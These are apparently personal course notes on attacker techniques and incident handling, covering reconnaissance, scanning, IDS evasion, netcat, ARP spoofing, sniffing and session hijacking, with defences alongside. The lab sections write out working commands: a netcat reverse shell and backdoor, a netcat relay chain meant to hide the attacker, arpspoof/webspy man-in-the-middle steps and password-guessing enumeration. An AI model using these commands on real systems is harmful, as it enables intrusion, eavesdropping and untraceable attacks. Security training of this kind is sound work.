Hacker Techniques, Exploits & Incident Handling Notes written by Uma Mahesh Padisetty Always have Handwritten Notes o Whom are you meeting, what did u ask, what commands . ✔ May be have audio recorders with you. o Sometimes video recordings can have policy obligations. ✔ When you do the job make sure management understands ur value in the form of Incident handling summary i.e., slide of all incidents, here are graphs. For a quite month include info from other or like SANS to avoid budget cuts. ✔ We need to have appropriate people on team should have core experts in all disciplines o Two from Unix, Two fron windows, o Network Management Personnnel as we get lot of info from routers and switches o In house Legal Council o Sometimes we need HR for taking actions on humans o Disaster Recovery /BCP should not be head on incident handling. ✔ Have System built checklist i.e., what are the basic system built documents for those servers etc. ✔ Inorder to run the Bridge calls, we need to have list of all contact info of key personnels or emergency calls. ✔ Test your stuff periodically(not regularly..they hate u). Source of Realworld Incident scenarios www.counterhack.net CounterHack PPt: http://www.cs.sjsu.edu/~stamp/CS286/ppt/ ✔ Incident Handlers sometimes need to have access to device with admin priveleges o Bargain with Operations Team. ✔ Provide a way to users to contact incident handling team o Provide hotline number, email source, occasional alert mails. o We need a special climate controlled room (say SOC) ✔ Always plan for backups for evidences ✔ Helpdesks are important and they are eyes of Incident Handling Team o Educate helpdesk people to report some specific incident to us. ✔ Incident Response Kit – set of tools o Have a jump bag of Harddisks to take backups. o Binay backup softwares – dd and windd o Netcat – move filysystem images across network, take output of certain commands o Forensic softwares o Freewares - Sleuthkit, Autopsy Commercial tools – Guidance software Encase Diagnosis software (sometimes a rootkit installed on the machine might lie to you regarding the badguy as rootkit modifies operating system itself. So carry your trustrworthy set of tools on a cd or pendrive for diognosis) o A good bootable Linux Disks – (eg: Helix) Use something like Taps to capture. Cant use Hubs,switches Cannot use on servers Bad guy can identify as it is bidirectional Available from NetOptics (USB powered TAP is easy to use) o Cables (1 straight through, 1 crossover cable, 1 USB to Serial cable, 1 Serial cable for Routers, extra harddrive cable) o Laptop with multiple operation systems (Atleast virual machines) ✔ Interview the operations people with open ended questions like what recent changes made the firewall? what recent configurations? what patches? any scripts executed? ✔ Involve your peers into handling the incident and everyone maintain notes.Also involve the necessary people such as adminstrator, business manager, Risk Manager, Client POC, etc. ✔ Network Perimeter Detection ✔ ✔ tcpdump -n Host Perimeter Detection Firewall Logs netstat -an Virus Response Tool Kir (LiveIR) System Administrator Cheet Sheets (for windows and linux) are some commands that system administrator use to find any anomalies. Session 2 – Click on PDF Below Not "If" but "When" Essential Incident Handling Techniques for System Administrators John Ives (jives@security.berkeley.edu) System and Network Security sc – services controller, services.msc, msconfig, net view etc., at – to check what jobs are scheduled, process explorer from sysinternals Netcat – To transfer data across TCP and UDP Ports We have to create a chain of evidences (Collection of events) on document. Eg: when law enforcement officer asks for harddrive, ask for proof (mail, fax) and then send Copy of the real. Preparation Identification Containment: o Short term containment: Pause the Attacker temporarily without changing the configurations made by attacker. Ie., Blocking the network, port, Isolate the machine. Maintain good relation with management sponser who will provide resources, remove blocks across. Management sponser can be LIRM, SDM – Notify him Coordinate with Network Personnel to isolate the Machine from network. It can be done by pulling the LAN cable from the machine, Blocking the switch port attached to the machine. Usually Badguys hit with IP address. Change the IP in DNS Servers so that your customers come to your actual service while bad guy try to his the old machine. It helps until we get some information. The Problem is convincing the Management. Maintain a Low Profile while investigating. Do not do reconnaissance from the infected machine. If needed do from other machine (Lab) Backup the Machine (Create Images – use DD, WinDD etc from Live CD) How do you deal with filesystems of terabytes of data??? Usually such devices has RAID Mirroring. So It has a button to synchronize the mirroring. Here you go., push the button and take it Using built-in backup softwares Copy Only system Partition where OS resides and the logs. Use some Tools for logging the incidents and provide the incident number. Eg: RTIR (Real Time Incident Response) - http://bestpractical.com/rtir/ BlackThorn - http://www.qccis.com/blackthorn o Long term containment and Erradication: remove/disable accounts shutdown/remove backdoor change passwords Erradication Recovery Lessons Learnt <<checkout the slides>> Ask Open ended questions. Do not ask yes/no questions. Espionage: Espionage or spying involves an individual obtaining information that is considered secret or confidential without the permission of the holder of the information. Tip#1: When handling such cases, use trusted people. Tip#2: Try target analysis of our own organization. Tip#3: To generate an event while transferring critical documents, assign a Unique Serial Number in it so that google can bring it up, Use some signature if IDS can identify the transfer.. Tip#4: Always have access to various logs, not just Device logs but physical logs such as Datacenter entry login/logout, call record of some person, surveillance videos etc., Unauthorized use: Tip#1: Organizational Reconnaissance. Phone Phishing: In the email, it states that your account has the problem, please call the number to fix It. The number goes to VOIP and phishing IVRS of the bank asking to input account number, pin for authentication. In Appropriate Web access: Pull the proxy logs.(But do it only if HR asks in writing not the manager asks) Bluecoat, SurfControl etc can block unwanted sites categorized as Pornography, Malware Sources etc Insider Threat: It could be contractor, business partner, employee. It can be destructive, non destructive (=>doesn’t mean not damaging, they copy and take it out) They might put Logic bombs . Warning Banner helps prevent insider threat. Always get authorization from HR when monitoring suspicious person otherwise might sue you. Ask open ended Questions… Intellectual Property Theft: Patents: Protect Innovations Copyrights: Protects specific expressions of ideas, content Trademarks: Protects Brands Confusion Attack: Using same fonts, colors to confuse between original and duplicate eg: Microsoft and Microsaft. Tradesecret Protection: Things we derive economic value for them being secret. Provides various penalties for violation. Protecting against Theft. How to identify breach in intellectual property? To prove the theft and intellectual property violation, we need to show that we made enough protection to it. Law, Crime and Evidence Three Domains: US Federal Law: Title 10 Section 2030: Computer fraud and Abuse Act 1) Computers working for govt 2)Computers associated with Infrastrucure 3)Computer associated with e-commerce The laws apply only if Damage > $5000 DAY2 Session 1 Talks about vulnerabilities, disclosures and complications Whenever vulnerability is found it is advised to contact vendor and go public when he patches or a timeframe of 90 days (mostly) and even 180 days before going public. If vulnerability found via Reverse Engineering, you could be sued by DMCA Act. Tipping point will buy the vulnerabilities. Send the vulnerability via Proxy like US Cert, SANS ISC. Hactivism: Hacking to make a political point. Create a Malware Create Botnet Rent the Botnet (eg: for Hactivism) Scarewares, Codecs – Drive by downloads How does Hacker start attacking? Reconnaissance Whois – one can get contact information of the domain Findout Registrar associated with the domain Registrar would provide details sometime IP can be block of ips, it can be ISP http://yehg.net/lab/pr0js/misc/wsa.php sometimes when the contact is person, then social engineering can be played on him for reconnaissance. P.s: There are some anonymous registrars who will not put up owners information. This will slow down contacting process DNS Interrogation Bad guys always want to have as many as records as possible. Zone Transfers – The hackers way to get most out of DNS. It is used to transfer DNS records from Primary NS to Secondary NS. However hackers exploit to collect the DNS Records. There are perl scripts (Found on BT) for DNS Enumeration – DIG can be used for zone transfer Get the Name Server #dig counterhack.com <<provides the Name server of counterhack.com>> Ask the Name server about the domain using Protocol AXFR (or IXFR) #dig @ns1.highland-parking.net counterhack.com axfr [As a security feature, most of name servers might disabled it] Nslookup on windows does the same purpose. Usually organization keeps secondary, teritiary NS with ISP, and whom support ZoneTransfer. Send a mail to ISP to block it. DNS is highly critical infrastructure and always harden it. Identification of DNS compromise: Look for Zone Transfer - Normal DNS use UDP 53 while Zone Transfer use TCP 53. Also DNS Reponse Bigger than 512 Bytes. Also DNS Request Bigger than 512 bytes can be an attack for buffer overflow. Website Searches : Press releases, Job Openings, Business Partners, Phishing attack on employees Defences: Preparation: Look at your own websites, See what your employees talk about in news groups Make Job opening description generic Identify web crawler activity from the logs Google Searches: Johny Lang – Using Google for Penetration Testing phonebook: James Smith Google Provide phone book search () – provides for US Directory– Search only from this site site: isc.sans.com Search only from this site link: wikihead.wordpress.com Shows everything that links to that site intitle: Honeypot Indepth Search the keywords in the title sometimes the files on the server are listed with title Index Hence “site:domain.com intitle:index” inurl: robots.txt Search term in the URLs. Helps identifying critical files like shown beside wikihead –malware - Discard the term malware from search (minus) + Eg: ‘X and Y’ strips out and so use X+and+Y X.Y - one character Google Cache: contain website image from google servers Helps to view deleted contents on the site P.S: Data in google cache can be removed by using google webmaster tools Language Translation http://translate.google.com Browse the website using google translator. You can browse anonymously…(not ultimate anonymous) filetype: pdf Reports only PDF files with given search terms Ext:rdp Shows rdp files (Remote desktop files) GHDB – Google Hacking Database robots.txt – it lists out what are the files or folder that should not be crawled [Honeypot Use# check the ip who accessed the file mentioned in robots.txt… it is a malicious bot] noindex, noarchive, nosnippet etc written to robots.txt can prohibit google Bot to capture unwanted info on the server. USERAGENT Switcher : A Plugin in Firefox to change the UserAgent of web request. Google URL Crawl Request Form: Google crawls the site from scratch again from root. GoogleCheatSheet.p df SAMSPADE – A simple tool for whois, dns, tracert etc for reconnaissance It has webcrawler. wget –r [Web crawling for local mirroring] SCANNING WarDailing: Phone Sweep: Dail the numbers in sequence. NudgeString: Replay a pattern of signal when modem is found (Modem style attack) Remediation: Use modem only if vendor has strong requirement, even if used ask for Strong userid and passwords. Conduct a WarDailing Exercise. [There are Voice IPS which detects wardailing and blocks the calls to modem if vulnerable] As in IR member, you should have contact with person who can tell you where the phone ends inside the company. Netstumber: It is a good tool for wardailing tools for Wireless Access Points. If WEP is used, capturing some packets can crack the keys. AIRCrack-NG: A superb one to crack the WEP keys. SESSION 2 KARMA - http://www.wirelessdefence.org/Contents/KARMAMain.htm KARMA is a set of tools for assessing the security of wireless clients at multiple layers. 1. It sniffs the 802.11 Probe request packets passively and there by discover clients. 2. From the packets, it extracts what network the clients want to connect to (I guess it would be SSID) 3. KARMA includes patches for the Linux MADWifi driver to allow the creation of an 802.11 Access Point that responds to any probed SSID 4. It starts the services ACCESS-POINT, DNS-SERVER, DHCP-SERVER, FTP-SERVER 5. When the user wants to connect to internet via ssid, Karma acts as MIM, assign a DHCP ip to victim and capture all the traffic. It acts as fake DNS, FTP server to capture credentials and returns nothing. karma-lan.xml - "This configuration runs a rogue DHCP, DNS and HTTP services on an existing (wired) network connection. The HTTP service redirects all requests to ExampleWebExploit module that displays simple HTML page" Usage: cd /tools/wifi/karma-20060124 bin/monitor-mode.sh ath0 bin/karma etc/karma-lan.xml ASLEAP – Exploits Cisco LEAP Protocol http://www.wirelessdefence.org/Contents/AsleapMain.htm The Lightweight Extensible Authentication Protocol (LEAP) is a proprietary wireless LAN authentication method developed by Cisco Systems. Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP instead of dynamic WEP. This password is not encrypted and transferred while authenticating, but some complicated hash ..blah.. blah..blah… is transmitted on air for authentication. There is a weakness which is exploited by using dictionary attack against those hashes transmitted to retrieve WEAK PASSWORDS. A simple defense strategy employed is MAC Filtering at AP… Oh…MAC is spoofable.. Just sniff the mac from packets and use when the machine is offline. WPA2 is Stronger Access Authentication Mechanism Attacking Aggressive mode IKE which is used for wireless VPN Connection is easily crackable It takes short cuts to improve performance by avoiding rekeying. IKE Aggressive Mode: In IKE Aggressive Mode the authentication hash based on a prehashed key (PSK) is transmitted as response to the initial packet of a VPN client who wishes to establish an IPSec tunnel. This hash is not encrypted. A packet sniffer (i.e. tcpdump) can be used to capture these hashes and a dictionary or brute force attack can be used against the hash to recover the PSK This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on this fact, we can learn that IKE Aggressive Mode is not very secure. Tool: IKECRACK - http://ikecrack.sourceforge.net/ Hence the tip is Disable Aggressive IKE Proof Of Concept: http://www.ernw.de/download/pskattack.pdf Cisco AP has integrated security mechanism and can also assist by jamming the Rogue machine. But it is problematic as it can jam any machines in the vicinity that belong to another company. Mostly Jamming is legally banned and will not be used. I believe other guy can sue you. There are some WIPS such as AirMagnet, AirDefense WIRELESS LAN Security Policies WEP shouldn’t be used Disable Aggressive IKE When Jammers are used, put a sign board notifying the same <<Working with NETSTUMBLER>> Is Wardriving with Netstumbler legal? Ans: It depends….. Since it sends BEACONs and receives Responses. Hence it is advised to disable DHCP. Passively sniffing is legally wrong as it might object their privacy. TIME: 30 MINS complete Network Mapping: We need to get topology Cheops-NG: http://www.digipedia.pl/man/doc/view/cheops-ng.1/ It is simple tool that provides what are the network mapping by using host discovery and also port discovery on the machines. It uses ping, traceroute for network mapping Sending a packet for traceroute with TTL = 1, i get first hop machine Sending a packet for traceroute with TTL = 2, we get second hop machine Features: Host discovery - Uses ICMP ping packets Machine fingerprinting to determine OS (using Nmap) - Runs an nmap command to determine OS fingerprinting. Use of DNS and ICMP to detect network hosts Network mapping - Mapping is done using UDP (or optionally ICMP) packets with small time-tolive values (traceroute and mtr, respectively) Usage: 1. First Start the Cheops Agent on the machine #cheops-agent & 2. Connect to Cheops-Agent #cheops-ng 3. Enter the IP of the machine on which Cheops-agent is running.. currently it is localhost 4. Add Host in the workspace.. just one targetmachine Recommendations ✔ Usually Corp blocks pings. ✔ Also Block outgoing ICMP packets >>>Simple Details on TCP, UDP Headers<<< Port Scanner – NMAPhttp://www.insecure.org/presentations/Shmoo06/ (nmap on windows is not reliable due to non robust TCP/IP stack in windows) Break: 1:35 Hrs Defenses ● ● Disable all ports until there is a business need periodically check the rule base for its need. Tools: Windows: netstat -a, netstat -ab --- it lists all details of dlls, process that are connected TCPView WMIC (Windows Management Instrumentation Control) Linux: LSOF (list open system files) lsof -i -- shows out open connections losf -- lists all the openfiles by all applications KILL – kills the process chkconfig – used to manage services to load in each of the runlevels chkconfig --list [name] chkconfig --add name chkconfig --del name chkconfig [--level levels] name <on|off|reset> Eg: chkconfig –-add xinetd chkconfig -–level 5 xinetd off Excerise Do TCP Scan, Decoys, SynStealth Scan, Connect Scan To check outgoing packets – tcpdump -lio Version Scanning Why not connect scan with Decoy scan? Passive Fingerprinting P0f2 NetworkMiner - http://networkminer.sourceforge.net/ It can also pull out files transferred from the dump files, clear text contents in the dumps. Very nice tool Determining Firewall Rules ✔ Using ICMP instead of UDP for traceroute can reveal info about the devices behind firewall, as they may not be blocked by firewall] ✔ #traceroute -I 10.9.23.1 UDP Port 53 is usually unblocked at firewall since it is needed for DNS queries/responses. Hence we need to fool the firewall. Normal traceroute will increase sourceport monotonically with each hop, and three packets are delivered to each hop. So inorder to send a packet that has port 53 at firewall, we have to set the initial port number as TargetPort – (number_of_hops * number_of_probes) – 1 I.e., 53 – (8 * 3) – 1 = 23 [suppose number of hops before reaching gateway is 8] #traceroute -p28 10.9.23.1 This will only give about device just after gateway only..:( Instead, stop the incrementation #traceroute -S -p53 20.9.23.1 Layer Four Traceroute (lft) It determines what packets are allowed through the firewall. Firewalk - http://packetstormsecurity.org/UNIX/audit/firewalk/firewalk-0.99.1.tar.gz It employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. Firewalk the tool employs the technique to determine the filter rules in place on a packet forwarding device. In order to use a gateway’s response to gather information, we must know two pieces of information: • The IP address of the last known gateway before the firewalling takes place • The IP address of a host located behind the firewall. Using Proxy Servers, can eliminate Firewalking Some NIDS, also detect firewalking. 2:28 PM – Vulnerability scanning These Vulnerability scanners detect only known vulnerabilities and do not identify zero-day vulns. Hence it is always advised to have multiple layers of security. As an exercise Just take the topology of DMZ and believe that one machine is compromised by zero-day vulnerability. Then think of the solution. Nessus They generate huge reports, which is hard to understand. It also donot do correlation, cross correlation. Nessus has Plugins, where each plugin tests one test on the target environment NASL (Nessus Attack Scripting Language) – is used to create plugins Architecture: Nessus Client communicates with Nessus Daemon Server that tells to do the scan. NessJ – A java based nessus client that provides in understandable format Dangerous Plugin – can cause damage to end system.(Like DOS based plugins for checking vulns) 1. Install Nessus 2. Create a certificate #nessus-mkcert 3. Add User #nessus-adduser 4. Start Nessus Server Daemon #nessusd -D 5. Start the Nessus Client #nessus 6. Nessus GUI is displayed, Login and start the scan 7. It is advaised to run updates periodically #nessus-update-plugins WebApp Scanner They knew about known CGI vulnerabilities, Active server page vulnerabilities etc Eg: Awstat vulnerabilities, phpBB vulnerabilities Nicto WebApp Scanner – A free tool written in perl. It will look for CGI files for vulnerabilities It looks into robots.txt It has port scanner It has application level IDS Evasion Supports Web Authentication supports ssl, it has mutation functionality Victo – a similar tool with GUI that includes Goolge Hacking DB support. IDS Evasion Packet Fragmentation – technique is used to evade detection In the Ip Header, DF bit – Dont Fragment MF bit – More fragments are coming Fragement Offset – used for reassembly IP ID value is used to assemble the fragments However, wireline IDS are detecting these attacks using Virtual Packet Reassembly Buffers. Unfortunately, Wireless IDS are not detecting fragmented packets, and can easily pass through. Sending Small Packet fagments (Session Splicing) Pause sending fragments so that IDS timeout but not the host machine Overlapping Fragments - For example, the first packet will include 80 bytes of payload but the second packet's sequence number will be 76 bytes after the start of the first packet. When the target computer reassembles the TCP stream, they must decide how to handle the four overlapping bytes. Some operating systems will take the older data, and some will take the newer data. FragRouter Some IDS gives you option to block fragmeted packets? Although not recommended. Check out before blocking. r Runs on Unix/Linux systems r Provides over 35 different schemes for fragmenting flow of data r Separates attack functionality from the fragmentation functionality Some Fragmentation Types, r Sends data in ordered 8-byte fragments r Sends data in ordered 24-byte fragments r Sends data in ordered 8-byte fragments with one fragment out of order r Complete TCP handshake, send fake FIN and RST (with bad checksums) before sending data in ordered 1-byte Obfuscating attack payload Send the data such that IDS cannot understand but victim Machine can understand. Viz., Using Unicode encoding, Attacking via HTTPS (Usually backdoors planted by attacker work under https) Inserting Traffic at the IDS Send the traffic such that IDS only see and determine state for a machine, but the packet actually doesn’t reach end machine. I.e., by sending a RST packet with less TTL value so that it expires after reaching IDS. Also sending a packet with bad checksum so that end machine will discard. Gaining Windows Data through Null Sessions [Enumeration] Most powerful account on the machine – system [not Administrator] A null session is an anonymous request comes such that I am nobody, coming from nowhere and please give me some data With a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provide information on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalating privileges and perform DoS attacks. Usually Information Enumerated by Intruders Network Resources and Shares User Accounts and Groups Applications Anyone with a NetBIOS connection to your computer can easily get a full dump of all your usernames, groups, shares, permissions, policies, services and more using the Null user ---Just check out for open ports on your machine 139, 445 which are netbios ports, almost 90% of machines have them open. Sample Hack using NetBIOS Null Session: 1. Impacket Samrdump - an application that communicates with the Security Account Manager Remote interface from the DCE/RPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service. bt smb-enum # samrdump.py guest:''@192.168.1.104 139/SMB Retrieving endpoint list from 192.168.1.104 Trying protocol 139/SMB... Found domain(s): . YOUR-O1N9OY17SK . Builtin 2. DumpSec – It dumps information about system users, file system, registry, Permissions, Password Policy and services 3. Enum – A simple console based tool that can be used in scripts #enum –u --- Lists users #enum –g --- Lists Groups #enum –s --- Lists shares #enum –p --- Lists Password Policy C:\> enum –D –u <username> -f <dictionary> dictionary is a file containing list of passwords which can be obtained from any password cracking tool Downlink for windows: http://www.indianz.ch/tools/scan/enum.zip 4. WinFingerprint Having Established a Session We can use tools like rpcclient to execute RPC command on the client machine. Defense: Change the Registry Entry Restrict Anonymous to 0x02 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA Drop the packets destined for port 135-139, 445 [ Default: 0x01 ] Day 3 Spoofing Sniffing Mac Flooding Arp spoofing Session Hijacking DNS Poisoning Buffer Overflows Format String Attacks & Exploits Spoofing Decoy scans with Nmap are examples of spoofing They are done to exploit trust relationship, to pass through ACLs, DOS attacks, to avoid logging attacker traces. 1. Change IP Address 2. TCP Guessing 3. Source Routing On Unix, source ip can be changed via ifconfig OnWindows, it can be changed via Network control panel or net sh Change IP Address Tools: Nemesis – It presents like TCP/IP stack, we you fill the data and it crafts the packets Hping2 Netdude – I can read the pcap files and graphically represent the communication. Here we can edit the connection settings etc., and save the capture. Now we are ready for Reply Attack. Now the Problem is How do you go with TCP 3 way handshake with spoofing? The receiver sends SYN/ACK to spoofed address, wherein he sends back RST. So whats the use? Spoofing is useful for UDP kind of Attacks TCP Guessing MitNick Attack to create 3 way handshake Prior to launch attack sample as many packets as from Admin Server and do statistical analysis to predict Sequence Number. 1) Disable Admin 2) Send spoofed SYN packet 3) Send spoofed ACK packet with predicted Sequence number 4) From Target machine perpective, it has established a tcp connection to admin 5) Now execute a command “Please add attacker to rchosts file. 6) Now attacker can directly authenticate with Target Machine Source Routing Defences 1. Make TCP Sequence number highly random i.e., always apply patch from vendor if it belong to TCP stack 2. Be careful with Trust Relationships (rlogin, rsh). It is advised not to extend trust relationship beyond the firewall. Since it’s recommended to allow trust relationship between machines having same level of control, threat and security. Also having firewall we can block the intruding attempts. 3. Authentication should not be based on IP Address. I.e., if you say allow only this ip to pass through to DMZ… Lol..it is spoofable. Hence use some other authentication mechanism like username password, VPN etc., 4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH. 5. Some Legacy systems might not work with ssh etc. In that case, Use another machine a hop prior to legacy machine. Connect to the machine in a secure fashion and then use rlogin, rsh to the legacy system 6. Anti Spoof Filters at firewalls Eg: If I see a packet with SIP 20.*.*.* from this interface, Drop it 7. Enable Unicast Reverse-Path Forwarding Check on Routers It check its routing table for source address and incoming interface to determine whether packet is coming from path that sender would use to reach destination. 8. No Source Routing, No IP directed Broadcast at Border Gateways. Identification 1. Make sure Anti Spoof Filters generate log when they detect spoofing. Usually Log analyzers such as Envison will collect logs from firewalls etc shows up these alerts 2. IDS Sensors that look at ip addresses that do not belong here. Containment 1. Identify the machine and remediate. NetCat - http://h.ackack.net/cheat-sheets/netcat It reads and writes data across network connections, using TCP or UDP Protocol. 1. Netcat Client Mode --It initiate connections 2. Netcat Server(Listen) Mode -- It listens on the tcp/udp port Command Options nc –l nc nc –L nc -u nc –p nc –e Nc –z nc –w <sec > nc –vv Description Listen Mode Client Mode Listen Persistently When listening normally using nc –l, it waits for connection. Once established and client terminates the connection, Listen mode is also dropped. Where as in Persistent listen mode, even if client terminates the Conn, it’s still listening. UDP mode, if no –u it is tcp In Listen mode, It is listen on that local port 80 In client mode, it sends data from source port 80 (Local) Execute a program after connection has occured Zero IO, no data transfer, only tcp connection estd, may send UDP packets Wait for connection, Eg: nc –w 3 waits for 3 seconds for connection before it is teared down.Even if connection is made and no data for 3 sec, it will go off. Very Verbose It can be used to transfer files on tcp/udp ports Port scanning, Banner grabbing A Small vulnerability scanner – what vulnerable services running on target Backdoor Relay Suppose we want to do port scanning, It is a good idea to use port 80,443 so as to evade detection. Also its better to scan ports in a random fashion using –r switch C:\>nc –v –r 192.168.12.1 1-100 Now connection is established… Whatever you type at client will be visible at server and viceversa. Transferring IO (Even Files) We need to use < > | to redirect IO between connections C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt Now readme.txt is transferred to another machine listening on port 17876 Backdoor Not only just input, it can bind an executable on some port specified On Server, C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exe listening on [any] 17876 ... DNS fwd/rev mismatch: localhost != RedPC On Client, C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 DNS fwd/rev mismatch: RedPC!= localhost RedPC [127.0.0.1] 17876 (?) open Now at client, Calculator has popped up. Backdoor 2 (Reverse Shell) Creating a listening shell with Netcat is a valuable technique but in order for this technique to be effective the attacker needs to be able to send data to the port on which Netcat is listening. This can pose a problem if there is a router or firewall in the path blocking inbound traffic as you will not be able to reach the listening port. We can also send commands to server to execute Attacker: Server is listening for connection C:\>nc -lvvp 4444 listening on [any] 4444 ... Victim: Client sends the terminal to server BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash 192.168.0.198: inverse host lookup failed: Unknown (UNKNOWN) [192.168.0.198] 4444 (krb524) open Alice: After Connection – Ready to take commands It is suggested to use Netcat instead of Telnet when you find any open port on any machine bcoz Netcat is fast and telnet use telnet control sequences which might blowup some applications running on end machine. Replay Attack From the pcap file, we can strip off headers and save the content only to a file and transfer to target machine using netcat. Eg; If we have transaction command “TRANSFER 1000$ from Acc A to Acc B”, replay it. Relay – When you attack victim, be untraceable.. Hackers use relays which are located at least in 5 locations which are geographically distant and has bad political relationship. Eg: To attack USA, start with relay at China India Pakistan Israel Ukraine. 1 2 Attacker first compromises Relay 1 and Relay 2 Configure a Relay with Netcat Listen on one Port and Netcat Client to forward to another Relay on another port. Attacker: C:\>nc <Relay1> 4321 Relay1: C:\> nc –L –p 4321 | nc <Relay2> 4321 Relay2: C:\> nc –L –p 4321 | nc <Target> 4321 NOW, We have established a one-way channel from attacker to Target Target: C:\>nc –L –p 4321 <<Not Clear Look into it>> 1:17 Defending Against Netcat Prevent Netcat file transfers Firewall configuration issue Secure against port scanning Minimal number of listening ports Block arbitrary connections to ports Close unused ports [Open port should have justification] Protect against vulnerability scanning Apply patches Backdoors Need to know what processes are running so you can detect rogue processes Prevent relay attacks No single point that attacker can relay around Stop persistent listeners Periodically check for unexpected listening ports Excersize Create Backdoor, Create Relay Scneraio: You are sitting outside firewall that blocks inbound access but allow outbound packets. How do get outside access to listener inside? SNIFFING Wireshark – It can parse many protocols Sniffit – It can be used in interactive mode sniffit –i i.e., its ability to handle the interactive sniffing of sessions in real time. Attacker can directly see what the victim is doing in real time sniffing the session These tools only works for Passive Sniffing (Parsing packets coming on to the NIC) and hence work in Hub environment Active Sniffing – Injects the packet into network so as to sniff in Switched Environment DSniff – A collection of tools for network auditing and penetration testing. Foiling Switches Using ARP Spoofing [Arpspoof] - Over an Ethernet, data is transferred using frames containing Source and Destination MAC addresses. The Destination Mac address is identified by sending ARP Request A Machine upon ARP Reply Packet, (irrespective of whether ARP Req sent or not) Machine updates ARP Cache (Mapping of IP to MAC Addr) 1. So If victim host receives a ARP Reply packet containing valid destination ip (A router/server etc) and attackers MAC Address… hoila…victims machines has been Poisoned. 2. Configure your machine with IP Forwarding (If the packet is not destined for your mac, forward to Default Gateway) IP Forwarding on Linux - echo 1 > /proc/sys/net/ipv4/ip_forward [TTL is decremented, as an investigator if we can identify if Initial TTL and TTL value has extra decremented, need to look into] Practically ARPs can be used for good, such as Failover cases, ARP the router to failover machine. Foiling Switches using Flooding the Switch [Macof] – 1. Send Ethernet frames with spoofed MAC address to the switch so that MAC Address Table on the Switch is filled and no more entries can be loaded 2. Now Some switches goes to either Denial of Service state delivering no packets or Hub state delivering packets across all the interfaces of the switch. Additional Tools with DSniff, TcpKill Kills active TCP connections When there is a telnet connection, you can break the connection by sending RST Packet to both ends. Now sniff while re authentication to gather Credentials Tcpnice Inject ICMP source quench Message to slow down the traffic FileSnarf Capture the Transferred Files MailSnarf Grabs e-Mails sent using SMTP and POP MsgSnarf Grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat, and Yahoo! Messenger URLSnarf Grabs the URL visited WebSpy Using the URLs captured from the network, displays the pages viewed by the victim on the attacker's browser. Essentially, Webspy lets the attacker look over the victim's shoulder as the victim surfs the Web. Webspy is quite useful for demos to management HTTPS don’t work Things that have auth using cookies etc., may or may not work Excerise - WebSpying on a Victim 1. Enable IP forwarding [ or use FragRouter with no fragmentation ] # echo 1 > /proc/sys/net/ipv4/ip_forward 2. ARP Poisoning on Victim and Gateway #arpspoof –i eth0 –t 192.168.1.5 192.168.1.1 [Poison the Target using Gateway IP] #arpspoof –i eth0 –t 192.168.1.1 192.168.1.5 [Poison the Gateway for Target IP] Now you are MIM. 3. Use WebSpy to grab the Browser traffic [IE and Netscape] #webspy –i eth0 192.168.1.5 [Spy on the target IP traffic] 4. Start Browser from Command line #firefox & 5. Now you can see what victim Is browsing. Just a Tip: If possible try to have proxy logging UserAgent Types in Webtraffic. We can identify malware infected machine and traffic. DNSSpoof WEBMITM (Web Monkey in the Middle) - It acts as proxy. After DNS Spoofing, the victim comes to you for the service he is trying. Eg: He want to go to Banking site www.abcbank.com, DNSSpoof running on attacker machine sends spoofed DNS Response to victim claiming it is the abcbank.com. Now user come to you. Now you have to either phish the site or proxy the site. The problem with above is Certificate Errors. Victim is presented with Attackers Certificate but not the abcbank.com certificate which will warn the users that somebody is pretending to be you bank. Firefox Certificate Warning Network Attacks 37 The Top Warning box can be avoided by having a signed certificate from CA. Second Warning Box is caused due to the fact that the browser will notice that the DNS name in the certificate does not match the name of the Web site that the user is trying to access A careful attacker can make sure the name on the certificate matches the domain name of the Web server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus certificate of someone impersonating a bank Unfortunately, most users just click yes..yes..yes to establish ssl connection with untrusted site. Same works for ssh also Defences system administrators, network managers, and security personnel understand and use secure protocols to conduct their job activities networks containing very sensitive systems and data, enable port-level security on your switches i.e. Bind the MAC address to a Port using Port Security. For Extremely sensitive networks like Internet DMZs, use static ARP tables on the end machines, hard-coding the MAC address to IP address mapping for all systems on the LAN. Takes extra overhead when changing NIC components. Identification On the suspect Unix machine, ifconfig the word PROMISC is there, it is listening On Windows, use PromiscDetect, another free tool at http://ntsecurity.nu/toolbox/promiscdetect To detect from Remote, use Sentinal that tests using EtherARP, EtherPing and DNS tests to identify. o EtherARP – send a ARP Req to suspect IP with bogus MAC, if Response received it is listening o EtherPING – same as ARP, but it uses ICMP ping. If it doesn’t sniff it should not see ping. o DNS Test – Send a DNS req, and check if any othermachine doing Reverse DNS of that website Containment If detected on one machine, it can be present on another machine Eradication Check for Rootkits and identify the process that is listening in promiscuous mode Recovery Monitor the attacker activity, as he is likely to use the information gathered by sniffing Day 3 Session 2 Session Hijacking Tools: o o o o o Hunt Dsniff --- sshmitm Ettercap Juggernaut IP Watcher, TTYWatcher, TTYSnoop Network-based session hijacking o Combines spoofing and sniffing o Alice and Bob have existing connection o Trudy is sniffing packets (on LAN) o Trudy starts injecting packets o Bob thinks packets came from Alice This works even if strong authentication used, provided there is no encryption ACK Storm ACK Storm can be avoided using Ettercap and Eve becoming Man in the Middle by ARP Poisoning. Now Eve sniffs the packets destined for DD.DD… and Replay to BOB. Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence number on those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the sequence number stream, so no ACK storm results. If Eve is far from Alic and Bob, Eve has to ARP Poison the routers/switches in between Eve and Alice, Eve and Bob. Defense Encrypted sessions prevent session hijacking because the attackers will not have the keys to encrypt or decrypt information. Therefore, an attacker cannot inject meaningful traffic into a session. Use all defenses that 